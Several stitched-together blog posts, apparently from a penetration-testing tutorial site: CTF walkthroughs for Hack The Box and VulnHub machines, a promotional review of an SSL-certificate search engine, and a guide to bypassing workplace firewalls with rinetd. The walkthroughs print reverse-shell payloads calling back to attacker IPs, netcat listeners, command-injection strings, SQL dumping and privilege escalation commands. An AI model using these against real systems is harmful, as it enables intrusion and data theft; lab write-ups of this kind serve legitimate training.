Great!! I logged in successfully and check shelly’s privileged and roles using sudo -l and found he has root privileged and an indication for a directory /usr/bin/perl with NOPASSWD. Now let’s get the root.txt by executing following command.

sudo perl –e ‘exec “/bin/sh”’

root.txt

We have successfully completed 2^nd task.

Enjoy Hacking!!

It’s generally believed that an SSL certificate is just a minor collection of the data files that digitally bond the cryptographic key to the businesses' details. Everyone supposedly knows that without the SSL certificate, all of the proper secure data on the website could get intercepted and used for blackmailing, identity theft, etc. Likewise, the certificate is important as a mean of forming the trust in the website and the commercial customer attraction. All of the listed benefits could be exploited by using the service, called CertDB, or by figuring out each one of them manually. Thanks to the user friendly interface of the service, however, I think it’s a worthwhile option for those only starting to wonder if the SSL certificates have the ability to change the nature of things around us.

The CertDB is an SSL certificate search engine that could be used for the various purposes. First of all, it allows the companies who specialize in the security breaches to find the problematic certificates with the aim of weakening the possibility of the hacker attacks. The service also functions as a useful tool during the penetration tests. Not to forget to mention that with the help of the certificate analysis one may discover the subdomains and domains of the particular focus that could turn to be vulnerable. Such an information may be used not only for the security but also in a profitable way. A commercial SSL-selling company, for example, could boost its own sales by warning those suffering from the “holes” in the system. Although, there is clearly no need to think of CertDBas os some advanced mechanism that is of no use to the non-experts on the internet. On the opposite, the service could turn to be truly practical, regardless of the fact that the creators position their service primarily for the research.

Have you ever wondered how come a simple internet user may figure out the plans of the entire company? Despite the various establishments’ enormous efforts to remain free of private info breaches and the strict non-disclosure deals, which could keep secrets for as long as desired, things could get leaked pretty easily. By exploiting the direct searching software of CertDB, one can surely find the newly-released SSL certificates that could be used for gathering the info, such as the company’s used domains, subdomains, and IP addresses. Thus, such a data could help the owner to interpret it in the variety of ways. For instance, the company may have just registered the domain indicating the upcoming start of the initial coin offerings (ico.xxx.com). This small piece of evidence may be actually crucial as it can be used for the competitive analysis and other business analytics among others. Sometimes, the company of the focus may issue the certificate in an organization with the domains of the other companies, which could mean the collaboration or the purchase of one company by another. Clearly, such a data could potentially benefit the owner as it can generate profits as an insight info or even lead to the start of the investigation (if there are hints of the unfair business practices). I, personally, find this to be truly appealing as CertDB has the promising power to shape the entire industries with its innovative and useful searching engine.

CertDB is clearly an unparalleled project, and there is an obvious need to mention the people working behind the doors of it. The SSL certificate search engine is only possible due to the SPYSE team of highly-skilled security specialists and IT experts of the area that constantly work on the IT projects all across the globe. Besides, it's fair to claim that the innovation is continuous, which is something that personally fascinates me. As I was writing this article, the SPYSE team has just released the subdomain searching tool (findsubdomains.com) that looks promising to me after doing the first-hand analysis. I will attempt to fully review the newly-released service in the short time, although there is one outstanding thing that I should already mention, being the free using cost of the service. It seems to me that the entire SPYSE team is functioning with the waves of enthusiasm in mind. Besides, there is a manifest sign of professionalism as can be seen by the capabilities of the CertDB website.

Hello friends!! Today we are going to solve another CTF challenge “Mantis” which is categories as retried lab presented by Hack the Box for making online penetration practices. Solving challenges in this lab is not that much easy until you don’t have some knowledge of Penetration testing. Let start and learn how to analysis any vulnerability in a network then exploit it for retrieving desired information.

Level: Intermediate

Task: find user.txt and root.txt file in victim’s machine.

Since these labs are online accessible therefore they have static IP. The IP of Mantis is 10.10.10.52 so let’s initiate with nmap port enumeration.

nmap -A 10.10.10. 52

From given below image, you can observe we found so many ports are open in victim’s network.

Since we have run nmap aggressive scan therefore in below image you can observe remaining result where the highlighted text is pointing towards victim’s system domain name and FQDN.

First of all we browse target IP through port 1337 in our web browser and saw following image of IIS7 and although here I didn’t get any clue for next step therefore automatically next I move for directory buster.

Then I preferred to use dirbuster tool and chose directory list 2-3 medium.txt file for directory brute force attack on http://10.10.10.52:1337 for php file extension.

As result I found a directory /secure notes with 200 ok response.

Here I saw two files dev_notes and web.config among these I’m interested in dev_notes test file let’s open it.

When I open dev_notes text file I read following contents as shown in below image and realize that it pointing towards a database “orcharddb” have “admin” as username, now I only need to know required password for login into database.

To me the file “/dev_notes_NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx.txt.txt” was looking suspicious as “NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx” was base 64 encoded therefore I need to decode this text for correct assumption of getting password.

When I decode our base 64 encoded text further I get hex code from inside it.

After decoding above hex text finally I found a password for admin user.

Using dbeaver we are go to connect with ms sql server as shown below in image. Now let login into database using database name and above found credential via port 1433

Great!! We are inside database now let enumerate database tables for retrieving some important information.

Further down the table blog_Orchad_Users_UserPartRecord I was able to catch the columns that holds usernames and passwords and found two usernames.

We had manually added target IP with htb.local and matis.htb.localthe domain names which we have found through nmap in our local host file.

Then we have installed impacket from git hub as given below command.

git clone https://github.com/CoreSecurity/impacket.git

Impacket is a assembly of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (for instance NMB, SMB1-3 and MS-DCERPC) the protocol implementation itself.

Now run install the downloaded file by executing following command

python setup.py install

Impacket contains goldenpac python file which is use for post exploitation, now execute given below command and access the victim’s terminal through that.

goldenPac.py htb.local/james@mantis.htb.local

From given below image you can observe that we had access victim’s terminal.

Now let’s finished the task by grabbing user.txt and root.txt file. First I move into james directory and check available files and directories inside it.

cd james

dir

Here I got a Desktop directory and after exploring it we found so many files and directory, at last I fetch user.txt file from inside /james /Desktop/ and use cat command for reading.

type user.txt

Our 1^st challenges finished successfully now move for 2^nd challenge.

At last I fetch user.txt file from inside /Adminstrator /Desktop/ and use cat command for reading.

type root.txt

Awesome!! We had successfully completed the challenge by finding both txt file.

Happy Hacking!!

Hello friends! Today we are going to take another CTF challenge known as BSides Vancouver. The credit for making this vm machine goes to “Abatchy” and it is another capture the flag challenge in which our goal is to gain root access and capture the flag to complete the challenge. You can download this VM here.

Let’s Breach!!!

Let’s start from getting to know the IP of VM with help of netdiscover Command (Here, I have it at 192.168.1.103 but you will have to find your own). Now let’s move towards enumeration in context to identify running services and open of victim’s machine by using the most popular tool Nmap.

nmap -p- -A 192.168.1.103 –open

Awesome!! Nmap has done remarkable job by dumbing the details of services running on open port 21, 22 and 80.

Moreover the highlighted text is reveling following details:

· FTP Anonymous login allowed

· Found a directory /backup wordpress with help of robot.txt

Without wasting time we accessed ftp service of victim’s system and found a user.txt.bk, let’s look into this file.

Its look like a text file with some username in it. Since port 22 is open so we can use these name for login into ssh if possible.

If you recall nmap result then it has shown /back_wordpress directory which we had explore in our web browser but Sadly we didn’t get anything from this web page although it sound for Wordpress site which is also a good sing.

Now we decided to use wpscan –u http://192.168.1.103 / –enumerate t –enumerate p –enumerate ucommand on the URL that we have entered in the browser. To check if there are any kind of vulnerable themes, plugins, username and etc.

The wpscan has enumerated the usernames where we have found the login credentials as admin and John.

Again we have used wpscan to find out the password credentials for the login credentials john. Here we have used following command to enumerate the password from the rockyou.txt file.

wpscan –u http://192.168.1.103/backup_wordpress –username john–wordlist /usr/share/wordlists/rockyou.txt

We see that for login credentials john, the password credentials matched is enigma.

After finding the username and password, we have used metasploit’s exploit wp_admin_shell_upload to upload the shell and get the meterpreter which is shown below.

use exploit/unix/webapp/wp_admin_shell_upload

msfexploit(unix/webapp/wp_admin_shell_upload) >set rhost 192.168.1.103

msfexploit(unix/webapp/wp_admin_shell_upload) >set targeturi /backup-wordpress

msfexploit(unix/webapp/wp_admin_shell_upload) >set username john

msfexploit(unix/webapp/wp_admin_shell_upload) >set password enigma

msfexploit(unix/webapp/wp_admin_shell_upload) >exploit

Great!! We had compromise confidentiality of the target’s system now penetrate more for completing this challenge.

We start penetrating targets machine and after 10-15 mints we came know about a cleanup file which has root privilege from inside contents of crontab file.

Then we downloaded cleanup file on our desktop so that we can modify it by editing our malicious code.

Meterpreter> download cleanup /root/Desktop

Using msfvenom we had generated a malicious python code by executing following command.

msfvenom -p cmd/unix/reverse_python lhost=192.168.1.108 lport=9876 R

Then copy the highlighted code for editing into cleanup file.

We had paste above copied text as inside cleanup file as shown in below image. In a new terminal we had start netcat for listening reverse connection.

nc -lvp 9876

Now we had transfer our malicious cleanup file into current directory i.e. /usr/local/bin and verify it using cat command.

Meterpreter> upload /root/Desktop/cleanup .

Meterpreter>cat cleanup

WOW we got reverse connection from victims system with root access now let’s catch the flag and finished the task.

cd /root

cat flag.txt

Solving challenge in this lab is not that much hectic therefore it is good task for beginners.

Hello friends!! Today we are going to solve another CTF challenge “Bank” which is categories as retried lab presented by Hack the Box for making online penetration practices. Solving challenges in this lab is not that much tough until you don’t have correct knowledge of Penetration testing. Let start and learn how to breach into a network then exploit it for retrieving desired information.

Level: Intermediate

Task: find user.txt and root.txt file in victim’s machine.

Since these labs are online accessible therefore they have static IP. The IP of Bank is 10.10.10.29 so let’s initiate with nmap port enumeration.

nmap -A 10.10.10. 29

From given below image, you can observe we found ports 22, 53 and 80 are open in victim’s network. As you have seen in our all previous lab that we love to explore target IP via port 80 on our web browser, similarly we follow that traditinal in this also but Bad Luck!! this time it didn’t work at all.

Now the last option was to add target IP inside /etc/host file since port 53 was open for domain and as it is a challenge of hack the box thus I edit bank.htb as domain name.

Then I explore domain name: bank.htb through web browser and found following login page as shown below.

Then I preferred to use dirbuster tool and chose directory list 2-3 medium.txt file for directory brute force attack on http://bank.htbfor php file extension.

Here I found so many directories but I was interested in support.php file. So when I try to explore http://bank.htb/support.php I was unable to access this web page as I was always redirect to login page due to http response 302.

So I installed noredirectplugin from firefox that allows to me stop any 302 redirections. I simply added http://bank.htb/login.php to the noredirect plugin so it can stop redirecting to /login.php consistently.

So now I’m able to access exact support.php page where I saw an upload option for uploading a php file hence we can try to upload php backdoor instead of a genuine php file.

Using msfvenom we had created a malicious shell.php file by executing following command.

msfvenom -p php/meterpreter/reverse_tcp lhost=10.10.14.6 lport=4444 -f raw

Simultaneously run multi/handler for reverse connection of victim’s system.

Then with the title shell I upload shell.php by adding “ignite” in the message box and click on submit. But failed to upload this file therefore without wasting time I simply intercept our browser HTTP request in Burpsuite.

From given below image you can observe that we had fetched intercepted http request of uploaded shell.php file.

After so many attempt I simply modify shell.php into shell.htband forward the intercepted data.

YES!! It successfully get uploaded, then I run this file and move back to metasploit framework for meterpreter session.

After executing uploaded backdoor file come back to metsploit framework and wait for meterpreter session.

msf use exploit/multi/handler

msf exploit(multi/handler) set payload php/meterpreter/reverse_tcp

msf exploit(multi/handler) set lhost 10.10.14.6

msf exploit(multi/handler) set lport 4444

msf exploit(multi/handler) exploit

From given below image you can observe meterpreter session1 opened for accessing victim tty shell.

meterpreter>sysinfo

Now let’s finish the task by grabbing user.txt and root.txt file. First I move into /home directory and check available files and directories inside it.

cd home

Here one directories chris, when I explore /home/chris I saw user.txt and use cat command for reading.

cd chris

cat user.txt

Great!! Here we had completed 1^st task now move to 2^nd tasK

Inside /var/ww/bank/uploads directory I checkout root privileges directory by executing following command.

find / -perm -4000 2>/dev/null

As result it dump so many directories have root privileges but I look at /var/htb/bin/emergency.

When I extract all directory here I found an emergency file which I had run for getting root access as shown below in image.

./emergency

Now let’s get the root.txt by executing following command.

cd /root

root.txt

We have successfully completed 2^nd task.

Hello friends!! Today we are going to solve another CTF challenge “Shrek” which is available online for those who want to increase their skill in penetration testing and black box testing. Shrek is retried vulnerable lab presented by Hack the Box for making online penetration practices according to your experience level; they have collection of vulnerable labs as challenges from beginners to Expert level.

Level: Intermediate

Task: find user.txt and root.txt file in victim’s machine.

Since these labs are online available therefore they have static IP and IP of sense is 10.10.10.47 so let’s begin with nmap port enumeration.

nmap -A 10.10.10.47

From given below image, you can observe we found port 21,22 and 80 are open in victim’s network.

As we know from the nmap scan that the target machine is running http on port 80, we use dirb to enumerate the directories.

dirb http://10.10.10.47

We first open the ip in our browser.

We open uploads/ directory that we found in the dirb scan and find a file called secret_ultimate.php.

Now we use wget to download the file into our system.

wget http://10.10.10.47/uploads/secret_ultimate.php

We open secret_ultimate.php and find a path to a directory called secret_area_51.

We open it in our browser and find an audio file in that directory.

We download into our system and use an online site called academo.org to analyse the spectrum, we find a hint to login through ftp using username donkey.

Further analysis of the audio file gives us the password to the username.

We login through ftp and find a few text files and a file simply called key.

We download the key and all the test files we use mget to mass download the txt files.

ftp> get key

ftp> mget *.txt

On our system as we can see all the files have been downloaded.

In the highlighted file above we found a base64 encoded string that were differentiated by space.

We decode the first base64 encoded string and find the decoded string to be ‘PrinceCharming’

In another file we find a base64 encoded string similarly differenctiated by space.

We decode the base64 encoded string and find a hexdecimal encoded string.

We use python to decode the hexadecimal string. We use seccure module and use ‘PrinceCharming’ as key to decode the string.

import seccure

string =”hexadecimal string”

print seccure.decrypt(string, “PrinceCharming”)

We open the key file and find that is a rsa key for ssh.

We use this key to login through using this rsa key. We use username as sec as we found earlier and use the passphrase we found before to login. As we login we go to /home/sec directory, in that directory we find a file called user.txt. When we open the file we get our first flag.

Going through the directories we find a file called thoughts.txt

We create a file called raj in this directory.

After a few minutes we find that it changed to root user and group.

Now to exploit the file we create a c program in our system that can give us the root.txt file in root directory. After creating the file we use SimpleHTTPServer module of python to transfer the file.

We now download the file into the target system using wget.

wget http://10.10.14.6:8000/shell.c

After downloading the file we compile the c program as rootshell.

gcc shell.c -o rootshell

We now wait for the system to change the user and group of the file. As soon as it changes the user and group of the file we run it and find the final flag.

Level: Intermediate

Task: find user.txt and root.txt file in victim’s machine.

Since these labs are online available therefore they have static IP and IP of sense is 10.10.10.27 so let’s begin with nmap port enumeration.

nmap -A 10.10.10.27

From given below image, you can observe we found port 22 and 80 are open in victim’s network.

As port 80 is running http on the target machine, so we open the ip address in our browser.

We don’t find anything on the homepage so we use dirb to enumerate the directories.

Now we open admin.php, and find a login page. We take a look at the source page but we don’t find anything.

When we use curl to access the page we find a password commented in the html page.

curl -v http://10.10.10.27/admin.php

We try the username admin and the password we find in the page to login through the page. We then get access to a page that allows us to run php code in it.

We first try to execute normal php payload but are unable to get a stable tty shell, so we use base64 encoded php shell to exploit this web application. We generate a base64 encoded shell using metasploit.

msfvenom -p php/meterpreter/reverse_tcp lhost=10.10.14.3 lport=4444 -e php/base64 -f raw

We paste this shell in the target machine’s page between tag.

We setup our listener using metasploit to get reverse shell. As soon as we run our shell on the page we get the reverse shell.

msf > use exploit/multi/handler

msf exploit(multi/handler) > set payload php/meterpreter/reverse_tcp

msf exploit(multi/handler) > set lhost 10.10.14.3

msf exploit(multi/handler) > set lport 4444

msf exploit(multi/handler) > exploit

After getting reverse shell we enumerate through the directories, in /home/xalvas we find a file called user.txt. When we open user.txt we find our first flag.

We also find a file called recov.wav; we download it to our system to gain further information.

download recov.wav /root/Desktop

We go to alarmclocks directory inside xalvas directory and find 1 mp3 and 1 wav file. We download both files into our system.

download rick.wav /root/Desktop/

download xouzouris.mp3 /root/Desktop

We use a tool called audacity to perform steganography on the audio files. Listening to the audio we find 2 of them sound similar. We load recov.wav and rick.wav into audacity, invert rick.wav then export the combination of both. After combining both the files we find a password in the audio “18547936..*”

We use username as xalvas and password that we found in the audio file to login through ssh into the target machine. When we run id command we find that the user is added in lxd group.

As lxd is a container technology we can run processes as root using lxd. To exploit this we download “lxd alpine builder” to create an image of alpine linux.

git clone https://github.com/saghul/lxd-alpine-builder.git

Now create a 32-bit image using lxd alpine builder.

We send the linux image to the target machine using scp.

scp alpine-v3.7-i686-20180405_0501.tar.gz xalvas@10.10.10.27:

We go to the target machine and import the linux image and create an image called ignite with administrative privileges.

lxc image import alpine-v3.7-i686-20180405_0501.tar.gz --alias alpine

lxc image list

We mount the whole filesystem into the container; we start the container and execute the shell the shell inside. After spawning the shell we open root.txt in /mnt/root/root directory and find the final flag.

lxc config device add ignite mydevice mydevice disk source=/ path=/mnt/root recursive=true

lxc start ignite

lxc exec ignite /bin/sh

Hello friends!! Today we are going to solve another CTF challenge “Europa” which is retried vulnerable lab presented by Hack the Box for making online penetration practices according to your experience leve.Solving challenges in this lab is not that much tough until you don’t have correct knowledge of Penetration testing. Let start and learn how to breach into a network then exploit it for retrieving desired information.

Level: Hard

Task: find user.txt and root.txt file in victim’s machine.

Since these labs are online available therefore they have static IP and IP of sense is 10.10.10.22 so let’s begin with nmap port enumeration.

nmap -A 10.10.10.22

From given below image, you can observe we found port 22, 80 and 443 are open in victim’s network.

As you have seen in our all previous lab that we love to explore target IP via port 80 on our web browser, similarly we follow that traditional in this also but Bad Unluckily!! This time it didn’t work at all.

Now the last option was to add target IP inside /etc/host file since port 443 was open containing two domain names and as it is a challenge of hack the box thus I edit europacorp.htb andadmin-portal.europccorp.htb as host name.

Then I explore domain name: admin-portal.europccorp.htbthrough web browser and found following login page as shown below.

In order breach confidentiality we can try SQL form based attack and to do so I preferred sqlmap following command to enumerate data based name.

sqlmap -u https://admin-portal.europacorp.htb --form --dbs --batch

Luckily our assumption set true and it dumbs the database name “admin”

Then I run following command for enumerating entire table details.

sqlmap -u https://admin-portal.europacorp.htb -D admin --dump-all --batch

Awesome!! I found a table “users” which 2 entries having username and password columns.

Using online MD5 decryption I cracked hash password and received “SupersecretPassword!” and use these credential for login into admin consol.

After fruitfully validation I got dashboard from where I step towards Tools options.

It was set up with a script for open VPN generator using the PHP function preg_replace() on user input. When I investigate more related to this function, it is suggested not to use preg_replace() on user input as it can lead to command execution vulnerability.

Considering above suggestion true, I fetched its request into burpsuite and sent it to repeater for exploit command injection vulnerability.

Here I notice three parameter pattern, ipaddress and test where we can add our arbitrary code for execution but before that you need to know correct step “how to exploit it” manually.

So when I search more related to this then I found so many link which was describing /e optionis threat to PHP preg_replace function.

Now the code can be execute by sending http post request as given below format.

pattern=/ip_address/e&ipaddress=arbitrary command&text=ip_addres

For example: To check directory list we can run following command and verify resultant output.

pattern=/ip_address/e&ipaddress=ls&text=ip_addres

Similarly we can run any malicious code inside this for achieving reversion connection.

Using msfvenom following command we had generated malicious bash code for getting a reverse connection from victim’s machine at our listening port.

msfvenom -p cmd/unix/reverse_netcat lhost=10.10.14.6 lport=1234 R

As shown in below image, the size of generated payload is 101 bytes, now copy this malicious code and send it to target. After that start netcat/multi handler for accessing reverse connection and wait for getting its TTY shell.

Now if you will run above copied code then it will get failed in its mission therefore before running the ordinal code you need to encode it in URL encoding format and then copy the URL encoded code for execution.

Now I had pasted above encoded code as shown in below image and execute it with GO tab.

Meanwhile I return to my metasploit terminal and wait for metepreter session by exploiting multi handler.

msf use exploit/multi/handler

msf exploit(multi/handler) set payload cmd/unix/reverse_netcat

msf exploit(multi/handler) set lhost 10.10.14.6

msf exploit(multi/handler) set lport 1234

msf exploit(multi/handler) exploit

From given below image you can observe command session1 opened for accessing victim tty shell then I upgrade command shell into meterpreter session.

Pleasing!! We have bind the shell of victims system,now let’s finish the task by grabbing user.txt and root.txt file and after traversing some directory I found user.txt file in /home/john

Meterpreter>sysinfo

Meterpreter>cd home

Meterpreter>cd john

Meterpreter>cat user.txt

Great!! Here we had completed 1^st task now move to 2^nd tasK

We start penetrating targets machine and after some time we came know about the clearlog file which has root privilege from inside contents of crontab file.

Using cat command we read contents of clearlogs here the cronjob was executing the shell script logcleared.sh with root permission.

Meterpreter>cat /etc/crontab

Meterpreter>cat /var/www/cronjaobs/clearlogs

Then we move into cmddirectory and for spawning proper tty shell of target’s system we need to import python3 file therefore I run following command inside meterpreter shell

python3 -c ‘import pty;pty.spawn(“/bin/bash”)

This time again we had use same payload cmd/unix/reverse_netcat generated malicious as above on a new port 5678 for reverse connection and copied the generated code and start netcat on a new terminal for getting reverse connection.

Then edit the above malicious code into logcleared.sh file with help of echo command and gave full permission as shown below.

nc -lvp 5678

WOW we got reverse connection from victims system with root access now let’s catch the flag and finished the task.

cd /root

cat flag.txt

Finally we have completed both task successfully and get juice experience.

Hello friends today we will discuss what is Port redirecting/ forwarding and necessary Steps for this technique for accessing network traffic through firewall restricted port.

First check out following things:

What is Port redirecting?

In computer networking, port forwarding/redirecting or port mapping is an application of network address translation (NAT) that redirects a communication request from one address and port number combination to another while the packets are traversing a network gateway, such as a router or firewall. This technique is most commonly used to make services on a host residing on a protected or masqueraded (internal) network available to hosts on the opposite side of the gateway (external network), by remapping the destination IP address and port number of the communication to an internal host.(From Wikipedia)

Why we need port redirection?

Suppose you are in your workplace where network admin has blocked all 65,535 ports in the network except port 80 and 443 for outgoing traffic. Now you want to access any service which is running on different port other than 80 and 443 but you are not allow to sent request packet on that port because port 80 and 443 are open ports in your network that can access web server only.

Hence to overcome such situation we need to apply port redirection techniques.

For example:you are in office and your IP is 192.168.1.102and firewall has restricted outgoing traffic through all 65535 ports except port 80 and 443 which are allowed to take the request packet outside network. Now you want to take access of remote system 192.169.1.114 which is running on port 3389 but firewall will block your request packet on port 3389. With help of proxy server 192.168.1.125 you (192.168.1.1.102) can access RDP server 192.168.1.114 for remote conection as proxy server will forward all incoming traffic to router and hence you will get access of port 3389.

Now let’s go through detail with its practical

Requirement

Windows operating system (Workstation machine) holding IP: 192.168.1.102

Windows operating system (Remote server) holding IP: 192.168.1.114

Linux operating system (proxy server) holding IP: 192.168.1.125

From given below image you observe RDP server IP: 192.168.1.114

From given below image you observe User system IP: 192.168.1.102 who will be bounded by firewall restriction policy.

Network configuration of Proxy server holding IP: 192.168.1.125.

Implementing Firewall on Users System

Create a new rule in firewall outbound rules for applying filter on outgoing traffic from your network. Enable Port option for creating a rule that controls connection for a tcp or udp port.

Apply rule for all TCP ports from 0-65535 as shown in below image.

Choose Block option as action should be taken when a connection matches specified condition.

Enable all three check box to which action will be implemented.

Provide title name to your implemented rule for your awareness.

Again create another new rule in firewall outbound rules for applying filter on outgoing traffic from your network. Enable Port option for creating a rule that controls connection for a tcp and do mention port 80,443 this time.

And this is phase changer step, enable “Allow the connection option” for all network i.e. domain, private and public. Give suitable title to rule name for your awareness.

Conclusion: Now being a network admin we have applied firewall rule to block outgoing traffic from port 0 to 65,535 but simultaneously allowed port 80 and 443 to take out traffic from our network to any web servers.

Situation: In a workstation any employee working in restricted network requires to connect with remote system: 192.168.1.14 via port 3389 but get failed due to firewall then how he can access port 3389 without turn off firewall in that network?

Solution: Port forwarding with proxy server using rinetd -- internet ``redirection server''.

Rinetd redirects TCP connections from one IP address and port to another. It is a single-process server which handles any number of connections to the address/port pairs specified in the file /etc/rinetd.conf. Since rinetd runs as a single process using nonblocking I/O, it is able to redirect a large number of connections without a severe impact on the machine. This makes it practical to run TCP services on machines inside an IP masquerading firewall.

For more details visit this link: https://boutell.com/rinetd/

By the means of above theory we need to install Rinetd in a system which is free from firewall restriction, hence it can be any system that is not a client a machine of your workstation. For example you can use your home PC/laptop for installing rinetd.

Similarly I had install rinted with help apt repository in my Home PC [192.168.1.125] operates at Linux platform that will act as proxy server.

apt-get install rinetd

After installing rinetd, open its configuration file from /etc/rinetd.config for configuring it as per your requirement.

Here we need to enter following details for port redirection.

· Bind address : Proxy server IP : 192.168.1.125 (Home PC)

· Bind port: 80

· Connect address : RDP server IP : 192.168.1.114

· Connect port: 3389

Then saved the file and restart the service with help of below command.

service rinetd restart

To establish remote connection with RDP server 192.168.1.114 you need send request packet for remote connection to Proxy server 192.168.1.125 on port 80 which will forward incoming traffic for the connection request to port 3389 of actual destination machine through router.

Enjoy!! The desktop of RDP server in your firewall congested network.

HTTP Port Redirection

Example 2^nd: In office my system is bound under firewall rules as configured above which will block outgoing traffic on every TCP port other than 80 and 443 but I wanted to access a web server which is running on port 8080 for security perspective reasons. Why should I do? Answer is Port redirection with proxy server using rinetd.

Let’s figure out how?

Requirement

Linux operating system (Workstation machine) holding IP: 192.168.1.128

Ubuntu operating system (web server) holding IP: 192.168.1.110

Linux operating system (proxy server) holding IP: 192.168.1.132

Network configuration of user’s workstation system holding IP: 192.168.1.128.

Implement firewall rule using IP table for blocking all outgoing TCP packets and allow port 80 and 443 for sending network traffic.

iptables -I OUTPUT -j DROP

iptables -I OUTPUT -p tcp --dport 80 -j ACCEPT

iptables -I OUTPUT -p tcp --dport 443 -j ACCEPT

Network configuration of proxy server system holding IP: 192.168.1.132.

Network configuration of web server holding IP: 192.168.1.110.

Here for security reason we are editing listen port from 80 to 8080 and to do so open ports.conffile form inside /etc/apache2 and make desirable changes.

As you can see we have transfer web server apache service on port 8080.

Then saved the file and restart the service with help of below command.

service apache2 restart

Now I had install rinted with help apt repository in my Home PC 192.168.1.132 operates at Linux platform.

apt-get install rinetd

After installing rinetd, open its configuration file from /etc/rinetd.config for configuring it as per your requirement.

Here we need to enter following details for port redirection.

· Bind address : Proxy server IP : 192.168.1.132 (Home PC)

· Bind port: 80

· Connect address : RDP server IP : 192.168.1.110

· Connect port: 8080

Then saved the file and restart the service with help of below command.

service rinetd restart

Now when you explore your proxy 192.168.1.132 server via port 80 it will redirect incoming traffic to destination web server 192.168.1.110 on port 8080 and you will access of it.

Hello friends!! Today we are going to solve another CTF challenge “Brainfuck” which is retried vulnerable lab presented by Hack the Box for making online penetration practices according to your experience level. Although in this challenge you can test your expertise by Wordpress penetration testing and how much knowledge you have in cryptography by decrypting any encryption that you will saw in this lab.

Level: Hard

Task: find user.txt and root.txt file in victim’s machine.

Since these labs are online available therefore they have static IP and IP of sense is 10.10.10.17 so let’s begin with nmap port enumeration.

nmap -A 10.10.10.17

From given below image, you can observe we found portso many port s are open such as 22,25 and so on in victim’s network and moreover I got three domain names as higlighted in image.

Now the last option was to add target IP inside /etc/host file since port 443 was open containing three domain names obtained from scanning result thus I edit sup3rs3cr3t.brainfuck.htb www.brainfuck.htb brainfuck.htb as host name.

Then I exploring all three domain names one by one in web browser but when I explore https://brainfuck.htb found following webpage page which is indicating it is a wordpress site and pointing toward SMTP mail Id orestis@brainfuck.htb as highlighted in below image.

Now we decided to use wpscan –u http://brainfuck.htb/ --disable-tls-checks –enumerate p –enumerate t –enumerate u command on the URL that we have entered in the browser. To check if there are any kind of vulnerable themes, plugins, username and etc.

From wpscan result I grabbed the vulnerability in wordpress plug-in “support plus responsive ticket system” for Remote code execution as highlighted below.

Moreover it dumped two login user name “admin & administrator”

With help of Google I search associated exploit for compromising victim’s credential and found exploit 41006 as shown below.

Inside this I saw html form code for remote code execution, now copy it and paste it into a text document.

Here please notice the changes I had made by adding “value: admin as username and orestis@brainfuck as email and target URL in action https://brainfuck” and saved it as wp.html on desktop.

Then I run Python script for file transfer via port 80.

python -m SimpleHTTPServer 80

Then explore wp.html file in localhost server as shown below and click on login tab.

By doing so You can login as anyone without knowing password because of incorrect usage of wp_set_auth_cookie().Then you can go to admin panel by visiting https://brainfuck once again.

You will get admin panel of wordpress and start penetrating it for getting a clue.

Inside admin dashboard I look at plugin for further step where I found SMTP plug-in.

It was terrific moment when I saw user authentication login are filled in text filed. So I read username “orestis” but password was in bold character which I need to convert in plain text using inspect element.

Wonderful!! Here is orestis plain text password value as shown below in highlighted text, let’s use them for smtp login.

Through telnet command: telnet 10.10.10.17 110 we established connection with SMTP server and login into orestis account, now for reading orestis inbox messages I run retr 1 but didn’t get any useful message and move to another message by running retr 2.

Here I found something very crucial that there is username and password for any “Secret” forum for login and after deep-thinking I realize this credential could be connected to sup3rs3cr3t.brainfuck.htbwhich I had explored in web browser.

Again I explore https:\\sup3rs3cr3t.brainfuck.htb then submit above found credential and got successful login.

It showing super-secret forum which is pointing towards any secret discussion chat inside “Key” and “SSH Access”

Inside “Key” I notice chatting between admin and orestis which was going beyond my sense. Might be orestis and admin are sharing some confidential information in this secret chat but in last reply of admin it look like he is secretly sharing any encrypted URL.

Then I open “ssh access” Ahhhh!!! It was an English conversation where admin is giving suggestion to use Key for login instead of simple password. And by reading all conversation I concluded that orestis has lost SSH login key and asking admin to send the key in an encrypted chat that we saw above “Key” (secret discussion).

Time to decrypt their conversation for getting ssh login key but don’t know from where to start. After spending so much time and efforts at last I successfully decrypted and found ssh login key.

Now you’re Question: How it become possible?

And my answer is: observe the given below step carefully:

From both chat “Key” and “ssh access” I copied following text into a text file respectively and removed the space provided between the word as shown in below.

· Pieagnm - Jkoijeg nbw zwx mle grwsnn (message in cipher text)

· Orestis - Hacking for fun and profit (decrypt key in plain text)

Considering cipher text is encrypted information and plaintext as decrypting key.

With help of online decipher I had pasted above cipher text inside encipher textbox and decryption key inside decipher textbox and received decipher message“BrainfuCkmybrainfuckmybrainfu”

If you remember we had obtained encrypted URL from inside “Key” discussion, go for its decryption using above decipher message “fuckmybrain” as decrypting key. It took much time to identify proper encryption algorithm used for encrypting URL and we successfully decrypt it with the help Vigerner cipher. It gave a plaintext URL for downloading id_rsa for ssh login as orestis.

From given below image you can observe that I have added encrypted URL in encrypted text field and used “fuckmybrain” as decrypting key and obtain Plain text URL.

After downloading id_rsa when I try to open this file, it required password to view its content.

Formerly I download a python script from here for cracking the password of this file. Then I ran following command and got desired output.

python sshng2john.py id_rsa > ssh_login

Then we used john the ripper for cracking this ssh_login file.

john ssh_login –wordlist=/usr/share/wordlists/rockyou.txt

“3poulakia!” we got as result from executing above command.

And without wasting time I execute following command for login into SSH using 3poulakia! as password.

ssh -i id_rsa orestis@10.10.10.17

Great!! I logged in successfully, now let’s finish the task by grabbing user.txt and root.txt file. First I check available files in current directory inside it. Good to see user.txt in present location and then I open it using cat.

cat user.txt

Apart from user.txt I found three more file in this directory and when I open these file I got hint for Root Flag! Now follow below steps if you are also looking for root flag.

When I read content of encrypt.sage, it was pointing towards encrypted password within debug.txt and output.txt

When I open debug.txt and output.txt and here I saw encrypted information then again I chased towards Google for any help in such type of encryption and luckily found a decrypting script from this link: http://dann.com.br/alexctf2k17-crypto150-what_is_this_encryption/and after that copied entire script into text file for decryption.

As describe in crypto150 algorithm I placed 1^st, 2^nd& 3^rdline of debug.txt equal to p, q, erespectively. Ct is equal to content of output.txt as shown below and saved it decrypt.py

Then run our decrypt.pythrough python and capture the root flag!!

python decrypt.py

Huhhhhh!!!!!! Such a hectic Lab it was but we have completed the challenge successfully.

